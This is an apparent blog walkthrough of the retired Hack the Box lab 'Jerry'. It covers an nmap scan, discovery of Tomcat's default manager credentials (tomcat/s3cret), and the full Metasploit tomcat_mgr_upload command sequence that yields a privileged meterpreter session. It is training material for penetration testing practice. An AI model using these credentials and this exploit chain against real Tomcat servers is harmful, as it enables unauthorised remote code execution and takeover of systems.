Hack the Box: Jerry Walkthrough

Hello CTF Crackers!! Today we are going to capture the flag on a Challenge named as “Jerry” which is available online for those who want to increase their skill in penetration testing and black box testing. Jerry is a retired vulnerable lab presented by ‘Hack the Box’ for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges from beginners to expert level.

Level: Easy

Flags: There are two flags. (user.txt & root.txt)

IP Address: 10.10.10.95

Methodology:

§  Port scanning and IP discovery

§  Browsing the IP on port 8080

§  Enumerating served webpage

§  Getting Login Credentials

§  Attacking using Metasploit

§  Getting root Access

§  Reading the flags

Walkthrough

Since these labs are available online via VPN therefore, they have a static IP. The IP of Jerry is 10.10.10.95

Let’s start off with scanning the network to find our target

nmap -sV 10.10.10.95

So here, we notice very interesting result from nmap scan, here it shows port 8080 is open for Apache Tomcat/ Coyote JSP Engine 1.1

Next order of business is to browse the IP on a Web Browser.

On opening the IP on the Web Browser, we are greeted with the default TomCat page. After some enumeration here and there, we found the “Manager App” Link. On clicking on this link, we are struck with a Login Form as shown below.

Here, after some twerking with some passwords and other stuff, we found that clicking on “Cancel” Button triggers a 401 Error.

After closely reading the example on the webpage provided, we got the Logon Credentials

User: tomcat

Password: s3cret

Its time to attack, using the swiss knife of any penetration tester – “Metasploit”.

After doing some research and some tries, it was clear that we can use the tomcat_mgr_upload exploit.

So, let’s do this:

msf> use exploit/multi/http/tomcat_mgr_upload

msf exploit(multi/http/tomcat_mgr_upload) > set rhost 10.10.10.95

msf exploit(multi/http/tomcat_mgr_upload) > set rport 8080

msf exploit(multi/http/tomcat_mgr_upload) > set HttpUsername tomcat

msf exploit(multi/http/tomcat_mgr_upload) > set HttpPassword s3cret

msf exploit(multi/http/tomcat_mgr_upload) > exploit

As show in the screenshot provided below, it is clear that the exploit runs successfully and gives an meterpreter session with elevated privileges.

We traverse through the Directories to get flag using commands like “ls” and “cd”

After a little bit of enumeration, we get to the C:\Users directory. Here we come across the Administrator User Directory so we traverse to that directory. And the further we traverse to the Desktop Directory.

This gives us the flags directory, which on opening gives us a text file named 2 for the price of 1. On opening we get both the user and root password.